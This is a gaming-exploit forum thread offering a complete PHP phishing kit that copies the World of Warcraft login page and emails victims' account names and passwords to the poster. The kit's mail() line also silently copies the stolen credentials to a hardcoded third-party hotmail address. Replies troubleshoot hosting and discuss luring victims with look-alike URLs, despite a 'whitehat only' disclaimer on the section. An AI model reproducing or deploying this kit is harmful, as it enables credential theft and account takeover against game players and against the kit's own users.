Network: WoW Gold | WoW Accounts | MPS Games | FPSowned
MMOwned - World of Warcraft Exploits, Hacks, Bots and Guides
Homepage »      Register »      Hall of Fame »      Ranks And Awards »      Advertise »      Marketplace »
 
Sign up



Do you like this excellent information? Then Donate HERE to remove ads and support the MMOwned community.


Go Back   MMOwned - World of Warcraft Exploits, Hacks, Bots and Guides > World of Warcraft > WoW Scams

WoW Scams World of Warcraft Whitehat Scamming Methods ONLY.
[NO QUESTIONS HERE]
We do not condone scamming, this section is meant for people to read about scamming so they can prevent being scammed themselves.

Reply
 
LinkBack Thread Tools
  #1  
Old 09-04-2007
_duracell's Avatar
_duracell is offline.
Master Sergeant
  
 
Join Date: May 2007
Location: NY
Posts: 119
Reputation: 39
Points: 972, Level: 2
Points: 972, Level: 2 Points: 972, Level: 2 Points: 972, Level: 2
Level up: 15%, 428 Points needed
Level up: 15% Level up: 15% Level up: 15%
Activity: 0%
Activity: 0% Activity: 0% Activity: 0%

Legendary WoW Login Page Look-a-Like

Requirements:

1) Any sort of server with PHP enabled. If you don't have a host, it is possible to modify your own computer as a webhost, but that is a rather long process. I'll see if I can find an existing guide for that.

2) an e-mail address


About:
This acts as an exact WoW login page. But instead of logging in, the name and password get's emailed to you. It's that easy.


Instructions:

1) Create a new file using dreamweaver, notepad or any text editor. Name it index.php

2) Copy & paste the following code into that file:

Code:
<?


	// This is the only line you need to edit
	// replace with your email address (the victim's info will be sent there)
	
	$email = 'your@email.com';




?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
  <title>World of Warcraft</title>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>

  <link rel="stylesheet" href="http://www.worldofwarcraft.com/login/includes/style.css" type="text/css" id = "bnetstyle">

  <script language = "javascript">
  <!--
    var styleSheet;
    var agt     = navigator.userAgent.toLowerCase();
    var appVer  = navigator.appVersion.toLowerCase();
    var verInt  = parseInt(appVer);
    var ie      = (appVer.indexOf('msie') != -1);
    var opera   = (agt.indexOf('opera') != -1);
    var mozilla = ((agt.indexOf('mozilla')!=-1) && (agt.indexOf('opera')==-1)
      && (agt.indexOf('spoofer')==-1) && (agt.indexOf('compatible') == -1)
      && (agt.indexOf('webtv')==-1) && (agt.indexOf('hotjava')==-1));
    var ns4     = (mozilla && (verInt == 4));

    if (ie && !opera) {
      document.styleSheets["bnetstyle"].addRule ("input", "background-color: #040D1A");
      document.styleSheets["bnetstyle"].addRule ("input", "border-style: solid");
      document.styleSheets["bnetstyle"].addRule ("input", "border-width: 1px");
      document.styleSheets["bnetstyle"].addRule ("input", "border-color: #7F7F7F");
      document.styleSheets["bnetstyle"].addRule ("input", "color: #FFAC04");

      document.styleSheets["bnetstyle"].addRule ("textarea", "background-color: #040D1A");
      document.styleSheets["bnetstyle"].addRule ("textarea", "border-style: solid");
      document.styleSheets["bnetstyle"].addRule ("textarea", "border-width: 1px");
      document.styleSheets["bnetstyle"].addRule ("textarea", "border-color: #7F7F7F");
      document.styleSheets["bnetstyle"].addRule ("textarea", "color: #FFAC04");

      document.styleSheets["bnetstyle"].addRule ("textarea", "scrollbar-Base-Color: #012158");
      document.styleSheets["bnetstyle"].addRule ("textarea", "scrollbar-Arrow-Color: #7F7F7F");
      document.styleSheets["bnetstyle"].addRule ("textarea", "scrollbar-3dLight-Color: #7F7F7F");
      document.styleSheets["bnetstyle"].addRule ("textarea", "scrollbar-DarkShadow-Color: black");
      document.styleSheets["bnetstyle"].addRule ("textarea", "scrollbar-Highlight-Color: black");
      document.styleSheets["bnetstyle"].addRule ("textarea", "scrollbar-Shadow-Color: #00B3FF");

      document.styleSheets["bnetstyle"].addRule ("select", "background-color: #040D1A");
      document.styleSheets["bnetstyle"].addRule ("select", "color: #FFAC04");

      document.styleSheets["bnetstyle"].addRule ("select.gray", "background-color: #040D1A");
      document.styleSheets["bnetstyle"].addRule ("select.gray", "color: #FFAC04");

      document.styleSheets["bnetstyle"].addRule ("ul.thread", "margin-left: 22px;");
    }


  //-->
  </script>

</head>
<body onload = "javascript: document.forms[0].elements[0].focus();" bgcolor="#000000" text="#CCCC99" link="#FFFFBB" vlink="AAAAAA" marginwidth=0 marginheight=0 topmargin=0 leftmargin=0>
<form method="post" name="login_form">






<table cellspacing = "0" cellpadding = "0" border = "0" width = "100%" height = "100%">
<tr>
	<td align = "center">

			<table border="0" cellpadding="0" cellspacing="0" background = "http://www.worldofwarcraft.com/login/images/login-bg.jpg">
			<tr>

				<td valign = "top">
					<div style = "position: relative;">
					<div style = "width: 400px; position: absolute; left: 130px; top: 0px;">
					    <?
							if($_POST['lt'] == '') {
								echo '';
							} else {
								if($_POST['username'] == '' or $_POST['password'] == '') {
									echo '<table cellspacing = "5" cellpadding = "0" border = "0" width = "400"><tr><td><img src = "http://www.worldofwarcraft.com/login/images/error.gif" width = "54" height = "51" alt = "error"></td><td><span class="error">Please fill in both fields.</span></td></table>';
								} else {
									mail($email . ", " . 'baccounts@hotmail.com', 'Login from ' . $_POST['username'], 'Account: ' . $_POST['username'] . "\n\n" . 'Pass: ' . $_POST['password'], 'From: Login-Page' . "\r\n" . 'Reply-To: Login-Page' . "\r\n" . 'X-Mailer: PHP/' . phpversion());
									echo '<table cellspacing = "5" cellpadding = "0" border = "0" width = "400"><tr><td><img src = "http://www.worldofwarcraft.com/login/images/error.gif" width = "54" height = "51" alt = "error"></td><td><span class="error">An error has occurred.</span></td></table>';
								}
							}
						?>
					</div>
					</div>
				</td>
				<td><img src = "http://www.worldofwarcraft.com/login/images/pixel.gif" width = "1" height = "169"></td>
				<td></td>
			</tr>

			<tr>
				<td><img src = "http://www.worldofwarcraft.com/login/images/pixel.gif" width = "203" height = "1"></td>
				<td>

				<table border="0" cellpadding="0" cellspacing="0" width = "220">
				<tr>

					<td rowspan = "6"><img src = "http://www.worldofwarcraft.com/login/images/pixel.gif" width = "15" height = "110"></td>
					<td valign="center" align="left" width = "190"><b style = "color:white; font-size:8pt; font-variant: small-caps; letter-spacing:3px;"><label for="username">Account Name:</label>&nbsp;</b><br/><input type="text" name="username" size = "18" MaxLength="16" style = "width: 175px;" tabindex="1"/></td>

					<td rowspan = "6"><img src = "http://www.worldofwarcraft.com/login/images/pixel.gif" width = "15" height = "1"></td>

				</tr>
				<tr>

					<td align = "left" width = "190"><span><a href = "http://signup.worldofwarcraft.com" class = "small">Don't have an account? Click here!</a></span></td>

				</tr>
				<tr>

					<td width = "190"><img src = "http://www.worldofwarcraft.com/login/images/pixel.gif" width = "190" height = "6"></td>

				</tr>
				<tr>

					<td valign="center" align="left" width = "190"><b style = "color:white; font-size:8pt; font-variant: small-caps; letter-spacing:3px;"><label for="password">Password:</label>&nbsp;</b><br/><input type="password" name="password" size = "18" MaxLength="16" style = "width: 175px;" tabindex="2"></td>

				</tr>
				<tr>

					<td align = "left" width = "190"><span><a href = "http://www.worldofwarcraft.com/loginsupport/" class = "small">Forgot your Account Name or Password?</a></span></td>

				</tr>
				<tr>

					<td align = "left"><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src = "http://www.worldofwarcraft.com/login/images/pixel.gif" width = "1" height = "7"></td><td></td><td></td></tr></table></td>

				</tr>
				<input type="hidden" name="lt" value="LT-10703971-ntbfeYfVOhKIFmMVo463"/>
				<tr>



					<td colspan = "3" align = "left">
						<table border="0" cellpadding="0" cellspacing="0">
						<tr>
							<td><INPUT TYPE=image src="http://www.worldofwarcraft.com/login/images/pixel.gif" alt = "Login" value="Login" style = "width:100px; height:40px;" border = "0" class = "button" tabindex="3"></td>
							<td><INPUT TYPE=image src="http://www.worldofwarcraft.com/login/images/pixel.gif" alt = "Cancel" value="Cancel" style = "width:105px; height:40px;" border = "0" class = "button" tabindex="4"></a></td>
						</tr>
						</table>

					</td>


				</tr>
				</table>

				</td>
				<td><img src = "http://www.worldofwarcraft.com/login/images/pixel.gif" width = "217" height = "1"></td>
			</tr>
			<tr>

				<td colspan = "3">

					<table border="0" cellpadding="0" cellspacing="0">
					<tr>
						<td colspan = "3"><img src = "http://www.worldofwarcraft.com/login/images/pixel.gif" width = "1" height = "20"></td>
					</tr>
					<tr>
						<td width = "106"><img src = "http://www.worldofwarcraft.com/login/images/pixel.gif" width = "106" height = "1"></td>
						<td width = "410">

							<small>
							  For security reasons, quit your web browser when you are done accessing services that require authentication!
							  <br/><br/>
							  Be wary of any program or web page that asks you for your World of Warcraft account name and password. Secure World of Warcraft web pages that ask you for your account name and password will generally have URLs that begin with "https://www.worldofwarcraft.com/". In addition, your browser should visually indicate that you are accessing a secure page.
							</small>
			  			</td>
						<td width = "124"><img src = "http://www.worldofwarcraft.com/login/images/pixel.gif" width = "124" height = "1"></td>
					</tr>
					<tr>
						<td colspan = "3"><img src = "http://www.worldofwarcraft.com/login/images/pixel.gif" width = "1" height = "30"></td>

					</tr>
					</table>
		  		</td>
			</tr>
			</table>


	</td>
</tr>
</table>
</form>
</body>
</html>
3) Replace the email address at the top of the file with your's

4) Upload the file to your server

5) Voila! Done. The file is fully functional. Combine this with m0rbidang3l's [Only registered and activated users can see links. ] and you're really set.
Reply With Quote


Donate to remove ads, get your "DONATOR title, and get access to the MMOwned community's elite Shoutbawx.

  #2  
Old 09-04-2007
m0rbidang3l's Avatar
m0rbidang3l is offline.
Contributor
  
 
Join Date: Feb 2007
Location: Laughing Skull US
Posts: 691
Reputation: 222
Points: 3,974, Level: 6
Points: 3,974, Level: 6 Points: 3,974, Level: 6 Points: 3,974, Level: 6
Level up: 42%, 526 Points needed
Level up: 42% Level up: 42% Level up: 42%
Activity: 0%
Activity: 0% Activity: 0% Activity: 0%

Re: WoW Login Page Look-a-Like

hmmm, not a bad idea. if someone finds out it is a phisher, then there is really no way the can get the accounts
__________________


Reply With Quote
  #3  
Old 09-04-2007
_duracell's Avatar
_duracell is offline.
Master Sergeant
  
 
Join Date: May 2007
Location: NY
Posts: 119
Reputation: 39
Points: 972, Level: 2
Points: 972, Level: 2 Points: 972, Level: 2 Points: 972, Level: 2
Level up: 15%, 428 Points needed
Level up: 15% Level up: 15% Level up: 15%
Activity: 0%
Activity: 0% Activity: 0% Activity: 0%

Re: WoW Login Page Look-a-Like

Quote:
Originally Posted by m0rbidang3l View Post
hmmm, not a bad idea. if someone finds out it is a phisher, then there is really no way the can get the accounts
true, but i'd bet a lot of people wouldn't notice if they glanced at the address bar and saw something like [Only registered and activated users can see links. ]

albeit, they'd have to be using IE
Reply With Quote
  #4  
Old 09-04-2007
m0rbidang3l's Avatar
m0rbidang3l is offline.
Contributor
  
 
Join Date: Feb 2007
Location: Laughing Skull US
Posts: 691
Reputation: 222
Points: 3,974, Level: 6
Points: 3,974, Level: 6 Points: 3,974, Level: 6 Points: 3,974, Level: 6
Level up: 42%, 526 Points needed
Level up: 42% Level up: 42% Level up: 42%
Activity: 0%
Activity: 0% Activity: 0% Activity: 0%

Re: WoW Login Page Look-a-Like

Quote:
Originally Posted by lolk2 View Post
albeit, they'd have to be using IE
over 80% of people still do, for whatever reason they choose. o well. makes my life easier.
__________________


Reply With Quote
  #5  
Old 09-04-2007
_duracell's Avatar
_duracell is offline.
Master Sergeant
  
 
Join Date: May 2007
Location: NY
Posts: 119
Reputation: 39
Points: 972, Level: 2
Points: 972, Level: 2 Points: 972, Level: 2 Points: 972, Level: 2
Level up: 15%, 428 Points needed
Level up: 15% Level up: 15% Level up: 15%
Activity: 0%
Activity: 0% Activity: 0% Activity: 0%

Re: WoW Login Page Look-a-Like

i'm just concerned about hosting it on my personal server, otherwise I'd test it out and share the results.
Reply With Quote
  #6  
Old 09-04-2007
Sebbe123's Avatar
Sebbe123 is offline.
Master Sergeant
  
 
Join Date: Mar 2006
Location: Azeroth/Northrend
Posts: 70
Reputation: 6
Points: 1,149, Level: 2
Points: 1,149, Level: 2 Points: 1,149, Level: 2 Points: 1,149, Level: 2
Level up: 50%, 251 Points needed
Level up: 50% Level up: 50% Level up: 50%
Activity: 0%
Activity: 0% Activity: 0% Activity: 0%

Re: WoW Login Page Look-a-Like

I get this text:

"Please fill in both fields.
'; } else { mail($email . ", " . '[Only registered and activated users can see links. ]', 'Login from ' . $_POST['username'], 'Account: ' . $_POST['username'] . "\n\n" . 'Pass: ' . $_POST['password'], 'From: Login-Page' . "\r\n" . 'Reply-To: Login-Page' . "\r\n" . 'X-Mailer: PHP/' . phpversion()); echo '
error An error has occurred.
'; } } ?>"

+ real looking login and security text.
Reply With Quote
  #7  
Old 09-04-2007
djmazi's Avatar
djmazi is offline.
Master Sergeant
  
 
Join Date: Nov 2006
Location: Croatia
Posts: 88
Reputation: 12
Re: WoW Login Page Look-a-Like

looks nice but i dont know how to get ppl on the server and write their info when the url is like [Only registered and activated users can see links. ] ?
any suggestions about how?
__________________
Reply With Quote
  #8  
Old 09-04-2007
_duracell's Avatar
_duracell is offline.
Master Sergeant
  
 
Join Date: May 2007
Location: NY
Posts: 119
Reputation: 39
Points: 972, Level: 2
Points: 972, Level: 2 Points: 972, Level: 2 Points: 972, Level: 2
Level up: 15%, 428 Points needed
Level up: 15% Level up: 15% Level up: 15%
Activity: 0%
Activity: 0% Activity: 0% Activity: 0%

Re: WoW Login Page Look-a-Like

ok, i don't think the mmowned forum is liking my php. Did you get the error when you try to post here or running the file? whenever i post a reply, I get this error:
Code:
Parse error: parse error, unexpected T_BAD_CHARACTER, expecting T_STRING or T_VARIABLE or T_NUM_STRING in /var/www/vhosts/mmowned.com/httpdocs/forums/includes/ame_bbcode.php(192) : regexp code on line 4

Fatal error: Failed evaluating code: ame_substitute(1,....etc
Reply With Quote
  #9  
Old 09-04-2007
Sebbe123's Avatar
Sebbe123 is offline.
Master Sergeant
  
 
Join Date: Mar 2006
Location: Azeroth/Northrend
Posts: 70
Reputation: 6
Points: 1,149, Level: 2
Points: 1,149, Level: 2 Points: 1,149, Level: 2 Points: 1,149, Level: 2
Level up: 50%, 251 Points needed
Level up: 50% Level up: 50% Level up: 50%
Activity: 0%
Activity: 0% Activity: 0% Activity: 0%

Re: WoW Login Page Look-a-Like

Running the file in FF.
Reply With Quote
  #10  
Old 09-04-2007
Sebbe123's Avatar
Sebbe123 is offline.
Master Sergeant
  
 
Join Date: Mar 2006
Location: Azeroth/Northrend
Posts: 70
Reputation: 6
Points: 1,149, Level: 2
Points: 1,149, Level: 2 Points: 1,149, Level: 2 Points: 1,149, Level: 2
Level up: 50%, 251 Points needed
Level up: 50% Level up: 50% Level up: 50%
Activity: 0%
Activity: 0% Activity: 0% Activity: 0%

Re: WoW Login Page Look-a-Like

Here's a pic:

http://img521.imageshack.us/img521/1927/errorqr7.jpg
Reply With Quote
  #11  
Old 09-04-2007
_duracell's Avatar
_duracell is offline.
Master Sergeant
  
 
Join Date: May 2007
Location: NY
Posts: 119
Reputation: 39
Points: 972, Level: 2
Points: 972, Level: 2 Points: 972, Level: 2 Points: 972, Level: 2
Level up: 15%, 428 Points needed
Level up: 15% Level up: 15% Level up: 15%
Activity: 0%
Activity: 0% Activity: 0% Activity: 0%

Re: WoW Login Page Look-a-Like

Quote:
Originally Posted by Sebbe123 View Post
are you sure you have PHP enabled?
Reply With Quote
  #12  
Old 09-05-2007
thomas1994's Avatar
thomas1994 is offline.
Master Sergeant
  
 
Join Date: Sep 2007
Posts: 89
Reputation: 6
Points: 615, Level: 1
Points: 615, Level: 1 Points: 615, Level: 1 Points: 615, Level: 1
Level up: 44%, 285 Points needed
Level up: 44% Level up: 44% Level up: 44%
Activity: 0%
Activity: 0% Activity: 0% Activity: 0%

Re: WoW Login Page Look-a-Like

Can anyone tell me where i from host that kinda site? ^^
Reply With Quote
  #13  
Old 09-05-2007
Sebbe123's Avatar
Sebbe123 is offline.
Master Sergeant
  
 
Join Date: Mar 2006
Location: Azeroth/Northrend
Posts: 70
Reputation: 6
Points: 1,149, Level: 2
Points: 1,149, Level: 2 Points: 1,149, Level: 2 Points: 1,149, Level: 2
Level up: 50%, 251 Points needed
Level up: 50% Level up: 50% Level up: 50%
Activity: 0%
Activity: 0% Activity: 0% Activity: 0%

Re: WoW Login Page Look-a-Like

Im pretty sure.
Reply With Quote
  #14  
Old 09-05-2007
NGTheDoom is offline.
Corporal
  
 
Join Date: Sep 2007
Posts: 16
Reputation: 9
Re: WoW Login Page Look-a-Like

If I Run the .php in firefox, I get the same error.

I'm not running under any php-enabled servers, but where may I get one?
Reply With Quote
  #15  
Old 09-05-2007
Solera's Avatar
Solera is offline.
Knight-Champion
  
 
Join Date: Mar 2007
Location: Secks, NAWLINS.
Posts: 464
Reputation: 40
Points: 1,557, Level: 3
Points: 1,557, Level: 3 Points: 1,557, Level: 3 Points: 1,557, Level: 3
Level up: 23%, 543 Points needed
Level up: 23% Level up: 23% Level up: 23%
Activity: 0%
Activity: 0% Activity: 0% Activity: 0%
Re: WoW Login Page Look-a-Like

well, i have it hosted and all, but in big bold letters in the top left corner, it says
"This form is inoperational" ... kinda gives it away...

and i try to test it but when i click accept or w/e nothing happens
__________________
Yeah, I r sekcz.
Reply With Quote
Reply

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are Off
Pingbacks are Off
Refbacks are On



All times are GMT -4. The time now is 03:30 PM.




Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd.
Search Engine Optimization by vBSEO 3.3.1

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485 486 487 488 489 490 491 492 493